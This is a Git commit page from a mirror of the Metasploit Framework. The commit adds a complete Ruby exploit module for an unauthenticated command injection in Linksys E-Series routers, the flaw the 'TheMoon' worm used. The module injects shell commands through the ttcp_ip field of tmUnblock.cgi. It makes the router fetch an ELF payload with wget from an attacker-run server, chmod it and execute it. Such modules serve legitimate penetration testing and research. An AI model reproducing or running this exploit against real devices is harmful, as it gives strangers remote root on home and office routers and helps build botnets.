infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

linksys themoon command execution exploit

bug/bundler_fix
Michael Messner 2014-02-18 19:42:50 +01:00
parent f07efc91a8
commit 4dda7e6bad
1 changed files with 249 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

249
modules/exploits/linux/http/linksys_themoon_exec.rb Normal file
View File

@ -0,0 +1,249 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys E-Series TheMoon Remote Command Injection',
'Description' => %q{
Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
injection. Since it is a blind os command injection vulnerability, there is no
output for the executed command when using the cmd generic payload. A ping
command against a controlled system could be used for testing purposes. This
vulnerability was used from the so called "TheMoon" worm. There are many Systems
that might be vulnerable: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500,
E1200, E1000, E900. This module was tested against a E1500 v1.0.5.
},
'Author' =>
[
'Johannes Ullrich', #worm discovery
'Rew', # original exploit
'infodox', # another exploit
'Michael Messner <devnull@s3cur1ty.de>', # Metasploit module
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', 'xxxxx' ],
[ 'EDB', '31683' ],
[ 'OSVDB', 'xxxxx' ],
[ 'URL', 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ],
[ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ]
],
'DisclosureDate' => 'Feb 13 2014',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
], self.class)
end
def request(cmd,uri)
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'encode_params' => false,
'vars_post' => {
"submit_button" => "",
"change_action" => "",
"action" => "",
"commit" => "0",
"ttcp_num" => "2",
"ttcp_size" => "2",
"ttcp_ip" => "-h `#{cmd}`",
"StartEPI" => "1"
}
})
return res
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
def exploit
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
uri = '/tmUnblock.cgi'
rhost = datastore['RHOST']
rport = datastore['RPORT']
#
# testing Login
#
print_status("#{rhost}:#{rport} - Trying to access the vulnerable url")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
})
if res.nil? or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible")
end
if [200, 301, 302].include?(res.code)
print_good("#{rhost}:#{rport} - Successfully accessed #{uri}")
else
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
end
if target.name =~ /CMD/
if not (datastore['CMD'])
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
cmd = payload.encoded
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
else
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
end
return
end
#thx to Juan for his awesome work on the mipsel elf support
@pl = generate_payload_exe
@elf_sent = false
#
# start our server
#
resource_uri = '/' + downfile
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
else
#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
#we use SRVHOST as download IP for the coming wget command.
#SRVHOST needs a real IP address of our download host
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
end
print_status("#{rhost}:#{rport} - Asking the Linksys device to download and execute #{service_url}")
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end
# wait for payload download
if (datastore['DOWNHOST'])
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
select(nil, nil, nil, datastore['HTTP_DELAY'])
else
wait_linux_payload
end
register_file_for_cleanup("/tmp/#{filename}")
#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end
#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
res = request(cmd,uri)
if (!res)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
# wait for the data to be sent
def wait_linux_payload
print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
waited = 0
while (not @elf_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
end
end
end
end